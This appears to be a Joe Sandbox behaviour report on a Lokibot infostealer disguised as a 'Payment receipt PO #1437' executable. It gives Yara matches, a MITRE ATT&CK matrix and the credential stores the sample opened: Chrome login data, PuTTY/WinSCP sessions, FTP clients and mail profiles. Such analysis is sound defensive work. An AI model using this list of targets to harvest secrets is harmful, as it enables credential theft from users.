Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Queries volume information: C:\Users\user\AppData\Roaming\euKeoTytdT.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.euKeoTytdT.exe.40b7e48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.euKeoTytdT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.euKeoTytdT.exe.40d1e68.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.euKeoTytdT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2228686790.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2289569837.00000000040D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2229898655.0000000003A47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2289569837.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2286478638.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2265215061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2229898655.0000000003A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe PID: 5100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: euKeoTytdT.exe PID: 7252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: euKeoTytdT.exe PID: 7596, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000A.00000002.3429388414.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe PID: 7208, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: PopPassword		17_2_0040D069
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: SmtpPassword		17_2_0040D069

Source: Yara match	File source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.euKeoTytdT.exe.40b7e48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.euKeoTytdT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.euKeoTytdT.exe.40d1e68.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.euKeoTytdT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2228686790.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2289569837.00000000040D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2229898655.0000000003A47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2289569837.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2286478638.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2265215061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2229898655.0000000003A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Masquerading	2 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	2 Credentials in Registry	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe